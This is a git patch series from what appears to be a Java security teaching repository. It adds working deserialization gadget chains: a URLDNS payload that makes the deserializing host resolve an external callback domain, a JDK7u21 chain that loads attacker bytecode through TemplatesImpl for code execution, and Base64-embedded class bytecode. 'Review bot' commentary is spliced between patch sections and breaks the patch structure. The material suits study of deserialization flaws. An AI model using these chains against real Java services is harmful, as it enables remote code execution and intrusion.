From a506fe4c443fb76451ecd03fc403126ac06b1259 Mon Sep 17 00:00:00 2001
From: phith0n
Date: Thu, 3 Jun 2021 21:34:14 +0800
Subject: [PATCH 01/10] URLDNS
---
 .../com/govuln/deserialization/URLDNS.java | 52 +++++++++++++++++++
 1 file changed, 52 insertions(+)
 create mode 100644 general/src/main/java/com/govuln/deserialization/URLDNS.java
diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/general/src/main/java/com/govuln/deserialization/URLDNS.java
new file mode 100644
index 0000000..296614c
--- /dev/null
+++ b/general/src/main/java/com/govuln/deserialization/URLDNS.java
@@ -0,0 +1,52 @@
+package com.govuln.deserialization;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.net.InetAddress;
+import java.net.URL;
+import java.net.URLConnection;
+import java.net.URLStreamHandler;
+import java.util.HashMap;
+
+public class URLDNS {
+
+ static class SilentURLStreamHandler extends URLStreamHandler {
+
+ protected URLConnection openConnection(URL u) throws IOException {
+ return null;
+ }
+
+ protected synchronized InetAddress getHostAddress(URL u) {
+ return null;
+ }
+ }
+
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String []args) throws Exception {
+ String url = "http://dns.675ba661.y7z.xyz";
+
+ //Avoid DNS resolution during payload creation
+ //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
+ URLStreamHandler handler = new SilentURLStreamHandler();
+
+ HashMap ht = new HashMap(); // HashMap that will contain the URL
+ URL u = new URL(null, url, handler); // URL to use as the Key
+ ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
+
+ setFieldValue(u, "hashCode", -1);
+
+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(ht);
+ oos.close();
+
+ System.out.println(barr);
+ ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
+ Object o = (Object)ois.readObject();
+ }
+}
From 12d64473659597c5d5b75b290faebec2e8a87661 Mon Sep 17 00:00:00 2001
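Review bot: `ObjectInputStream ois` at the end of main() is never closed, and the result of `readObject()` is bound to an unused `o` through a redundant `(Object)` cast; the pom still targets 1.8 at this point (the next commit lowers it), so `try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) { ois.readObject(); }` closes the stream and drops the dead variable. `HashMap ht = new HashMap();` is a raw type — `Map<URL, String> ht = new HashMap<URL, String>();` serializes identically and lets the compiler check the put(). The `setFieldValue(u, "hashCode", -1)` line deserves a why-comment, since `ht.put(u, url)` presumably cached a hashCode on the URL through the silent handler and this resets it: `// reset the hashCode cached by put() so it is recomputed when the map is read back`. `System.out.println(barr)` renders the binary stream through ByteArrayOutputStream.toString() with the platform charset, which is lossy; printing a hex or Base64 encoding would be more useful for inspection.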
From: phith0n Date: 2021年6月23日 12:03:30 +0800 Subject: [PATCH 02/10] add JDK7u21 --- general/general.iml | 19 ++++++ general/pom.xml | 15 +++-- .../com/govuln/bytes/HelloDefineClass.java | 5 +- .../com/govuln/bytes/HelloTemplatesImpl.java | 4 +- .../deserialization/CommonsCollections3.java | 1 - .../CommonsCollectionsIntro2.java | 4 +- .../CommonsCollectionsIntro3.java | 4 +- .../com/govuln/deserialization/JDK7u21.java | 66 +++++++++++++++++++ .../TemplatesImplDeserialization.java | 4 +- 9 files changed, 107 insertions(+), 15 deletions(-) create mode 100644 general/general.iml create mode 100644 general/src/main/java/com/govuln/deserialization/JDK7u21.java diff --git a/general/general.iml b/general/general.iml new file mode 100644 index 0000000..7ee5fc5 --- /dev/null +++ b/general/general.iml @@ -0,0 +1,19 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/general/pom.xml b/general/pom.xml index 8ad9f54..9153046 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.8 - 1.8 + 1.7 + 1.7 @@ -42,6 +42,13 @@ javassist 3.12.1.GA + + + commons-codec + commons-codec + 1.15 + + @@ -94,8 +101,8 @@ org.apache.maven.plugins maven-compiler-plugin - 8 - 8 + 7 + 7 diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java index 9ae4bb9..93c46ac 100644 --- a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java +++ b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java @@ -1,7 +1,8 @@ package com.govuln.bytes; +import org.apache.commons.codec.binary.Base64; + import java.lang.reflect.Method; -import java.util.Base64; public class HelloDefineClass { public static void main(String[] args) throws Exception { 
@@ -9,7 +10,7 @@ public static void main(String[] args) throws Exception { defineClass.setAccessible(true); // source: bytecodes/Hello.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); hello.newInstance(); } diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java index 598788e..c8fae6f 100644 --- a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java @@ -2,9 +2,9 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import java.lang.reflect.Field; -import java.util.Base64; public class HelloTemplatesImpl { public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 
@@ -15,7 +15,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java index 521ce73..d8cce44 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java 
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -20,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java index d50a6ed..1ed70dd 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; @@ -9,7 +10,6 @@ import org.apache.commons.collections.Transformer; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; 
@@ -22,7 +22,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("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"); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java index 0694a86..c7b8427 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java 
+++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java @@ -3,6 +3,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; @@ -11,7 +12,6 @@ import javax.xml.transform.Templates; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; 
@@ -24,7 +24,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java new file mode 100644 index 0000000..e3fb4d0 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java 
@@ -0,0 +1,66 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.codec.binary.Base64; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.LinkedHashSet; +import java.util.Map; + +public class JDK7u21 { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + String zeroHashCodeStr = "f5a5a608"; + + HashMap map = new HashMap(); + map.put(zeroHashCodeStr, "foo"); + + Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); + handlerConstructor.setAccessible(true); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + + setFieldValue(tempHandler, "type", Templates.class); + Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); + + LinkedHashSet set = new LinkedHashSet(); // maintain order + set.add(templates); + set.add(proxy); + + setFieldValue(templates, "_auxClasses", null); + setFieldValue(templates, "_class", null); + + map.put(zeroHashCodeStr, templates); // swap in real object + + ByteArrayOutputStream barr 
= new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(set); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java index ec9aa5e..c2ff080 100644 --- a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java +++ b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -20,7 +21,6 @@ import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; -import java.util.Base64; import java.util.HashMap; import java.util.Map; 
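Review bot: `setFieldValue` in JDK7u21 is a verbatim copy of the helper in URLDNS.java (the HelloTemplatesImpl and CommonsCollectionsIntro hunks of this commit show further copies); a single package-level reflection helper would remove the duplication. `String zeroHashCodeStr = "f5a5a608";` is a magic value with no explanation — `// "f5a5a608".hashCode() is 0` states the property the variable name only hints at. As in URLDNS, `ois` is never closed and `Object o = (Object)ois.readObject();` keeps a dead variable with a redundant cast; `ois.readObject();` inside a try-with-resources is enough. main() starts on the previous physical line, so the hunk is seen across two lines here.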
@@ -33,7 +33,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); From 43f431135fd7330cfd61d277ed02d6eb2218d922 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 05:26:50 +0800 Subject: [PATCH 03/10] my own JDK7u21 --- .../java/com/govuln/deserialization/JDK7u21.java | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index e3fb4d0..eb037cc 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -15,6 +15,7 @@ import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.HashMap; +import java.util.HashSet; import java.util.LinkedHashSet; import java.util.Map; 
@@ -29,24 +30,25 @@ public static void main(String[] args) throws Exception { String zeroHashCodeStr = "f5a5a608"; + // 实例化一个map,并添加Magic Number为key,也就是f5a5a608,value先随便设置一个值 HashMap map = new HashMap(); map.put(zeroHashCodeStr, "foo"); + // 实例化AnnotationInvocationHandler类 Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); handlerConstructor.setAccessible(true); - InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map); - setFieldValue(tempHandler, "type", Templates.class); + // 为tempHandler创造一层代理 Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); - LinkedHashSet set = new LinkedHashSet(); // maintain order + // 实例化HashSet,并将两个对象放进去 + HashSet set = new HashSet(); // maintain order set.add(templates); set.add(proxy); - setFieldValue(templates, "_auxClasses", null); - setFieldValue(templates, "_class", null); - - map.put(zeroHashCodeStr, templates); // swap in real object + // 将恶意templates设置到map中 + map.put(zeroHashCodeStr, templates); ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(barr); From b9847809da5a39456cb229a12688ee5e2efd13f5 Mon Sep 17 00:00:00 2001 
From: phith0n Date: Wed, 7 Jul 2021 21:54:39 +0800 Subject: [PATCH 04/10] =?UTF-8?q?=E4=BD=BF=E7=94=A8LinkedHashSet=E8=A7=A3?= =?UTF-8?q?=E5=86=B3=E6=9C=89=E6=97=B6=E5=80=99=E6=97=A0=E6=B3=95=E8=A7=A6?= =?UTF-8?q?=E5=8F=91=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E9=97=AE?= =?UTF-8?q?=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 原因是templates与proxy是有顺序的,如果用HashSet将丢掉顺序,这样有概率无法触发 --- general/pom.xml | 14 ++------------ .../java/com/govuln/deserialization/JDK7u21.java | 2 +- 2 files changed, 3 insertions(+), 13 deletions(-) diff --git a/general/pom.xml b/general/pom.xml index 9153046..1d58119 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.7 - 1.7 + 1.6 + 1.6 @@ -96,15 +96,5 @@ - - - org.apache.maven.plugins - maven-compiler-plugin - - 7 - 7 - - - diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index eb037cc..a7824f5 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -43,7 +43,7 @@ public static void main(String[] args) throws Exception { Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); // 实例化HashSet,并将两个对象放进去 - HashSet set = new HashSet(); // maintain order + HashSet set = new LinkedHashSet(); set.add(templates); set.add(proxy); From 635e63d641d508ba4e63313336b8750298c41004 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 23:42:18 +0800 Subject: [PATCH 05/10] update manual --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index dbfc6f7..cc8c809 100644 --- a/README.md +++ b/README.md 
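Review bot: `HashSet set = new LinkedHashSet();` in JDK7u21.java declares the variable as the broader type while the comment above it still says the code instantiates a HashSet, so the reason this commit exists (insertion order must survive, as the commit message explains) is invisible in the code. Declare it as `LinkedHashSet set = new LinkedHashSet();` and move the reasoning next to it: `// LinkedHashSet keeps insertion order: templates must precede proxy in the stream, HashSet gives no such guarantee`. With that declaration the `import java.util.HashSet;` added by the previous commit becomes unused and can go. The enclosing main() starts and ends outside the hunk.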
@@ -22,6 +22,7 @@ - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) +- [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) ## Demo代码 @@ -42,6 +43,7 @@ - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) - 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: From 7371e48a2af6eeb518523f5e88ba55238607e182 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 9 Jul 2021 03:29:44 +0800 Subject: [PATCH 06/10] add serialization module --- general/pom.xml | 17 +++++++ .../com/govuln/serialization/Application.java | 47 +++++++++++++++++++ .../com/govuln/serialization/Converter.java | 39 +++++++++++++++ .../com/govuln/serialization/model/Card.java | 12 +++++ .../com/govuln/serialization/model/User.java | 15 ++++++ 5 files changed, 130 insertions(+) create mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/Converter.java create mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java create mode 100644 general/src/main/java/com/govuln/serialization/model/User.java diff --git a/general/pom.xml b/general/pom.xml index 1d58119..97a028b 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -48,6 +48,13 @@ commons-codec 1.15 + + + commons-io + commons-io + 2.10.0 + + 
@@ -96,5 +103,15 @@ + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java new file mode 100644 index 0000000..65c0712 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Application.java @@ -0,0 +1,47 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Hex; +import org.apache.commons.io.IOUtils; +import static java.io.ObjectStreamConstants.*; + +import java.io.*; + +public class Application { + public static void main(String[] args) throws Exception + { + write(); + read(); + } + + public static void write() throws Exception + { + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(new User()); + + String data = Hex.encodeHexString(byteSteam.toByteArray()); + System.out.println(data); + ProcessBuilder builder = new ProcessBuilder( + "java", + "-jar", + "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", + data); + InputStream is = builder.start().getInputStream(); + IOUtils.copy(is, System.out); + } + + public static void read() throws Exception + { + Object[] data = { + STREAM_MAGIC, STREAM_VERSION, + TC_STRING, + "123123", + }; + byte[] bs = Converter.toBytes(data); + System.out.println(Hex.encodeHexString(bs)); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); + Object obj = ois.readObject(); + System.out.println(obj); + } +} diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/general/src/main/java/com/govuln/serialization/Converter.java new file mode 100644 index 0000000..d3b6ed4 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Converter.java 
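Review bot: `write()` in Application.java hard-codes the absolute Windows path `"D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar"`, so the example only runs on the author's machine; taking the jar location from a system property and skipping the dump when it is unset keeps the serialization part runnable everywhere. The spawned process is also never waited for, its stderr is not consumed and `is` is not closed, which can leave a partially printed or hung dump; `redirectErrorStream(true)`, try-with-resources on the stream and `waitFor()` after the copy fix that. `oos` is never flushed before `byteSteam.toByteArray()` is read (the name looks like a typo for byteStream), while the rest of the repo closes the ObjectOutputStream first. The compiler plugin this commit adds to pom.xml sets source/target 8, so try-with-resources is available.
```java
public static void write() throws Exception
{
    // … unchanged: serialize new User() into byteSteam …
    oos.flush();
    String data = Hex.encodeHexString(byteSteam.toByteArray());
    System.out.println(data);
    // path to the SerializationDumper jar (constructed property name); skip the dump when not configured
    String dumper = System.getProperty("serializationdumper.jar");
    if (dumper == null) {
        return;
    }
    ProcessBuilder builder = new ProcessBuilder("java", "-jar", dumper, data);
    builder.redirectErrorStream(true);
    Process process = builder.start();
    try (InputStream is = process.getInputStream()) {
        IOUtils.copy(is, System.out);
    }
    process.waitFor();
}
```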
@@ -0,0 +1,39 @@
+package com.govuln.serialization;
+
+import java.io.ByteArrayOutputStream;
+import java.io.DataOutputStream;
+import java.io.IOException;
+import java.io.ObjectOutputStream;
+
+public class Converter {
